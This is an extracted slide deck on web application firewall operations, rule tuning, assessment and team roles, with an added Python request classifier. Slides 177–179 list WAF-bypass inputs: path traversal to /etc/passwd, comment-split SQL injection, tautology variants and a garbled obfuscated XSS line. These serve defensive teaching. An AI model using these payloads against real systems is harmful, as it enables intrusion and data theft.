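
```python
# Added example, not code from the deck: turn raw requests like R1-R3 into the
# incident record shape shown above (Entity / Detections / Prevention / Time /
# Source IP). The three detections, the method allow-list and the sample
# requests are constructed for illustration; they are not a real WAF rule set.
import re

ALLOWED_METHODS = {"GET", "POST", "HEAD", "OPTIONS", "PUT", "DELETE", "PATCH"}
URL_META_CHARS = set("'\"<>;|`\\")                 # restriction: character set on the URL
SCANNER_MARKERS = [re.compile(r"\bnikto\b", re.I)]  # informational signature in headers

# Constructed samples mirroring R1, R2 and R3 from the slide
R1 = ("GET /314355195369564852'2.php HTTP/1.1\r\n"
      "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n"
      "Host: sirt.club\r\n\r\n")
R2 = ("TRACK / HTTP/1.1\r\n"
      "Connection: Keep-Alive\r\n"
      "Host: sirt.club\r\n"
      "Trace-Test: Nikto\r\n\r\n")
R3 = ("OPTIONS /API/V1/login HTTP/1.1\r\n"
      "User-Agent: Mozilla/5.0 Firefox/11.0\r\n"
      "Host: sirt.club\r\n\r\n")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def classify(raw, ts, src_ip):
    """Run the three traps over one request and build the incident record."""
    req = parse_request(raw)
    path = req["target"].split("?", 1)[0]
    detections = []
    meta = sorted({c for c in path if c in URL_META_CHARS})
    if meta:
        detections.append("meta char in URL " + "".join(meta))
    if req["method"] not in ALLOWED_METHODS:
        detections.append("restricted method " + req["method"])
    for name, value in req["headers"].items():
        if any(p.search(value) for p in SCANNER_MARKERS):
            detections.append("scanner signature in header " + name)
    return {
        "Entity": path.rsplit("/", 1)[-1] or "/",
        "Detections": detections,
        "Prevention": "blocking page" if detections else "allow",
        "Time": ts,
        "Source IP": src_ip,
    }


if __name__ == "__main__":
    for raw in (R1, R2, R3):
        print(classify(raw, "11:12:13", "10.0.0.138"))
```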
175.
User action and flow
Pages and parameters:
/ – Info (dynamic)
products – ProductID, Cat
Login – username, password
Account – Username, email
Payment – pay, CCN, checkout, amount, password
Classify Actions – flows:
Flow 1: a) Main page browser b) Link: Login page c) Bookmark: account d) Login
Flow 2: a) Browse /add items b) Login c) Auto Login d) login
Flow 3: a) Check out b) Update CCN c) Browser items d) Login
Flow 4: a) Payment b) Browse Items c) Payment d) Login
Timings: 1 min, 2 min, 30 sec, 1 sec, 2 sec, 1.5 sec
177.
WAF Bypass and Normalization
Goal: bypass the WAF protections
% Case insensitive
% Comments
% Encoding
% Tricks and Koontz
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
GET /search.php?q=< < < < < < HTTP/1.1
GET /search.php?q=SRC=javascr[encoded line break]5;pt:alert('XSS')> (obfuscated javascript: URI, garbled in extraction)
GET /search.php?q=" ' exploit & < >
179.
Normalization – Anti Bypass
Norm | WAF Signature
Change to lower case -> exploit:
GET /search.php?q=ExPloiT HTTP/1.1
Host: sirt.club
Remove comment in the parameter value -> match sig ('and 1=0 union select all from table;):
GET /search.php?q=' and 1=0 un/**/ion/**/sel/**/ect all f/*haha*/rom table HTTP/1.1
Host: sirt.club
Any True condition in the parameter value -> match sig: Any OR X = X/Y - block
OR 'bypass' = 'bypass'
OR 'Bypass' = A'Bypass'
OR 'Koontz' = ' Koo'+'ntz'
OR 'Koontz' LIKE 'Koo%'
OR 'Koontz' > 'K'
OR 'Koontz' < 'Z'
181.
[Chart: Main App traffic (0–7) across the day – off hours, morning, noon, afternoon, off hours – split into Users, Partners, Attack]
AMO:
1. Riding the wave
2. Decoy
3. Multi vector
Attacks:
1. App Stress
2. Vul hunting
3. Brute force
183.
Relationships : AE, PE, Policy and Reporting
Attack Elements (AE): ▪ Vulnerability ▪ Attack Surface ▪ Attack Agent ▪ Exploit ▪ Attack Vector ▪ AMO
Reporting: GRAPHS, STATISTICS, LOGS, DASHBOARD
Protection elements (PE) -> Protection rule -> Protection policy
• Entities: PROTOCOL, PAYLOAD – HEADERS, USER INPUT
• Detections: SIGNATURES, ANOMALY, RESTRICTIONS, CLIENT INTERROGATION
• Prevention: ALERT, BLOCK, LIMIT, FOLLOW UP
• Rule
• Rule sets
Search the AE’s in the PE’s using the reporting to stop the attacks with Prevention rules
184.
Rule maturity = Time + Traffic
PR outcome: No Hits -> OK / FN; Hits -> RA / FP
Rule life cycle (1 2 3 4): 1. Enforce 2. Monitoring -> Refine 3. Enforce 4. Alert -> Refine; Block -> alert – refine
Handling RA/FP/FN/FA
1. RA – Real Attack: true attack needs blocking
2. FP – False Positive: wrong detection (blocking but shouldn’t)
3. FN – False Negative: lack of detection (should be blocked but not)
4. FA – False alarm: mistake
185.
AMI Vulnerable | AMI Under attack | AMI Compromised
2. MITIGATIONS: SEEK -> PREVENT | SEEK -> DESTROY | SEEK -> RECOVER
3. RESPONSE: APPLY -> VERIFY (for each)
SEVERITY: Y/N | RA/FP/FN | Y/N; N = BTR
BTR
186.
SECURITY CENTER – WA-CAV Score - Site
Brute force | App DDoS | Vul Hunting
60% | 80% | 50% (By requirement*)
Traffic Break Down | Valuable users - Allow | Suspicious - Monitor | Malicious – Block
App A | 71% | 6% | 25%
App B | 20% | 20% | 60%
App C | 61% | 20% | 17%
Security Level: 63.3% | 58.2%
187.
WAF health – site
Site Traffic: [Chart: App 1, App2, App3, App4 – y axis 56.00%–72.00%]
App Attacks: 80% 95% 95% / 20% 23% 31% (By requirement*)
Incidents: E:H D:S BLOCK; E:URL D:A ALARM; E:IP D:R RATE LIMIT – severities Critical / High / Medium – 1IP 100 Req, 1IP 10Req, 10IP 1000Req
WAF A – Zone 1 (Main): CPU, Memory, Bandwidth
WAF B – Zone 2 (sub): CPU, Memory, Bandwidth
193.
WAF - Visibility manager
App: main – Number of visits per Search engine
Time: | Per 1 day | Per 1 week | Per 1 month
Search engine A | 2 | 10 | 20
Search engine B | 0 | 2 | 6
Search engine C | 10 | 150 | 3000
Valuable users – customers – Breakdown
Traffic break down | Valuable customers (allowed) | Allowed automation | Suspicious monitored | Malicious – blocked
App A | 71% | 2% | 6% | 21%
App B | 20% | 1% | 20% | 59%
App C | 61% | 1.5% | 20% | 17%
Total RPS: 11,000 | 80000
Top URL: 22,000 RPS | 11,0000
Total session: 12000 active sessions, 8000 new sessions | 1000 active sessions, 8000 new sessions
IP/ session: IP-X (3000), IP-Y (1200), IP-Z (2000) | IP-X (2300), IP-Y (1000), IP-Z (1500)
195.
WAF levels by PE (detection)
WAF levels: | Signature | Anomaly | Restrictions | Client interrogation
ID/PS | Yes | No | No | No
Bot Manager | No | No | No | Yes
WAF | Yes | Yes | Yes | No
WAF NG | Yes | Yes | Yes | Yes
*Full requirements in SIRT.club
WAF levels: | Web Exploit | Brute Force | aDDoS | Automated traffic
ID/PS | Partial | Limited | Limited | Limited
Bot Manager | Partial | Partial | Partial | Partial
WAF | Good | Best | Best | Good
WAF NG | Best | Best | Best | Best
196.
WAF policy requirement (DSMM) by PE
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational ❑ Generic exploits ❑ Specific exploit
Anomaly ❑ Request per second (RPS) ❑ Failed login (FLI) ❑ Session opening
Restriction ❑ Character sets ❑ RFC & evasion ❑ Flow
Client interrogation ❑ CAPTCHA ❑ Client capabilities ❑ Source ID (SID)
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page ❑ TCP FIN / RESET /Drop ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
197.
WAF RFP – WAF requirement (DSMM)
App ❑ Classic ❑ Modern ❑ Mix
Location
Cloud ❑ Cloud public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (cloud <-> op)
On Prem ❑ On Prem ❑ Multi On Prem ❑ Hybrid (op <-> cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF type ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center (learning) ❑ WAF reporting ❑ Graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI ❑ ______
198.
WAF requirement (DSMM)
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update/ upgrades ❑ WAF centralized report ❑ Policy ❑ Traffic aggregation (unified reporting)
Updates and upgrades
Updates ❑ Break Fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API
199.
Testing types App WAF
[Stack: Web app / App / Web app – Virtualization – OS/HW – Web Server, App Server, Database Server]
• Testing app for vulnerability
• Testing infrastructure for vulnerabilities
• Testing traffic loads
• Testing scaling mechanism
• Testing supply chain for vulnerabilities
• Testing functionality
• Testing hardening and defaults
• Testing User input
• Testing fuzzing
• Testing coverage
201.
Security testing – App / WAF
[Stack: Web app / App / Web app – Virtualization – OS/HW – Web Server, App Server, Database Server]
Testing App without WAF
Testing the WAF
Testing App with WAF
✓ AE testing - RA
✓ PE testing – CAV/SAP
✓ SE testing - FN
202.
WAF assessment
Brute force | App DDoS | Web exploit | Automated attacks
60% | 70% | 50% | 35%
Traps - Detections
Signature ❑ Information ❑ Generic exploits ❑ Specific exploit ❑ Customer
Anomaly ❑ Requests per second (RPS) ❑ Failed login (FLI) ❑ Session increase ❑ Session opening
Restriction ❑ Character sets ❑ RFC & evasion ❑ Evasion ❑ Flow ❑ Structure
Client interrogation ❑ CAPTCHA ❑ Client capabilities ❑ Source ID (SID) ❑ If then
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging ❑ Mobile App
BLOCK ❑ Blocking page ❑ TCP FIN / RESET ❑ Drop connection ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting ❑ Access limiting
FOLLOW UP ❑ Redirect to main ❑ Redirect to honeypot ❑ Soft Blocking
203.
How to test it
Security controls test (Router -> NWFW -> WAFNG -> ADC/LB -> NF; tested by Vulnerability scanner, Pen test, Red team):
• Vulnerability scanner (CVE)
• Pen test – manual / crafted botnets
• Bug bounty - mass wisdom
• Red team - proprietary tools
204.
Vulnerability and Security exposure
• Testing for Vulnerability in the web application
• Use WAF to virtual patch
• Patch the app
• Testing for Vulnerability in the WAF
• Patch the WAF
• DP vs CP
• WAF Bypass – the WAF can be bypassed, but there is no vulnerability in the web app to protect
• Fix the WAF
• Holistic approach
• Security exposure – the WAF can be bypassed, exposing the web app to a vulnerability that exists (FN)
• Fix the WAF
• Holistic approach
206.
Testing Personnel
SOC / SECURITY TEAM: CSIRT, PSIRT, Internal STA
SECURITY TESTING: External STA, 3RD PARTY EVALUATOR SECURITY TESTING
PSIRT – Patching products/ application
CSIRT – Any type of attack on/in the org
STA – Org security advisor / SGP / assessment
207.
WAF assessment
WAF assessment security score: • Internal testing (I) • External testing (E) • Average (A)
| Brute force | App DDoS | Vul Hunting
WAF security score - internal (I) | 60% | 80% | 40%
WAF security score - external (E) | 60% | 70% | 50%
Average (A) | 60% | 75% | 45%
208.
Service / Data / Compute -> Disruption / Breach / Compromised
• Ami under attack
• Ami vulnerable
• Ami compromised
Protection elements (• Entities • Detections • Prevention) -> Protection rule (• Rule) -> Protection policy (• Rule sets)
CURRENT POLICY: RA – rules set; FP – clean traffic
BYPASS POLICY: SE – bypass
MISSING POLICY: FN – missing
Current -> Limitation -> improve
Pre prod -> Base prod -> Post prod
213.
SIRT scaling
VP -> GM -> Dir SIRT / Dir -> Mgr NA, Mgr WW -> SME, Sr SE, SE, Jn SE
Teams:
• CSIRT
• PSIRT
• TASIRT
215.
Security Personnel – Traditional
Environments: Staging ENV, Prod ENV; NF, WAF NG; Web Server/s, Application Server/s, Database Server/s
DEV (CODERS, ARCHITECT):
▪ Developing the Web App
▪ Web servers
▪ App server
▪ Data bases
▪ Sessions management
▪ Functionality
▪ ….
OPS:
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
Where should security be ?
216.
Security Personnel – Modern
Environments: Dev ENV, Staging ENV, Prod ENV; NF, WAF NG; CODERS, ARCHITECT; DEV, OPS
▪ App – CIA
▪ Resources
▪ Security
▪ ….
▪ Developing the Web App
▪ Microservices
▪ Containerized
▪ Functionality
▪ ….
DEV OPS:
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
Where should security be ?
218.
SE Matrix
Columns: Knowledge (theory) | Skills (hands on) | Experience (time) | Notes – each for Jr, SE, Sr, A, STA
Experience (time): 1Y 3Y 6Y 10Y 14Y
Target: Y Y Y Y Y | i ii iii iii iii
Attack: Y Y Y Y Y | ii iii iii iii iii
Security: Y Y Y Y | ii iii iii iii iii
Policy: Y Y Y Y | i i iii iii iii
Incidents: Y Y Y | ii iii iii iii
Architecture: Y Y | i iii ii iii
Operations: Y Y Y Y | ii i i iii
Traffic control: Y Y | iii iii iii
Assessment: Y | i i iii
SIRT roles:
• Jn SE
• SE
• Sr SE
• Architect
• Security Trusted Advisor
Levels:
i. Basic level
ii. Advance level
iii. SME – Expert
219.
Topics: 1. TARGET 2. THREAT INTEL 3. SECURITY 4. POLICY BUILDING 5. RESPONSE 6. SECURITY DESIGN 7. TRAFFIC MANAGEMENT 8. OPERATIONS 9. ASSESSMENT
Roles: Jn SE | SE | Sr SE | Architect | TSA
Knowledge vs Time/experience, stages 1–4:
1) You think you know but you don’t know
2) You know that you don’t know – learning
3) You don’t know that you know – value
4) You know that you know – Master
220.
Mission board
Roles: PSIRT | CSIRT | STA | Management (CSO)
One-time tasks
Daily tasks
Weekly tasks
Twice-monthly tasks
Monthly tasks
Quarterly tasks
Twice-yearly tasks
Yearly tasks
Per need tasks
Mission board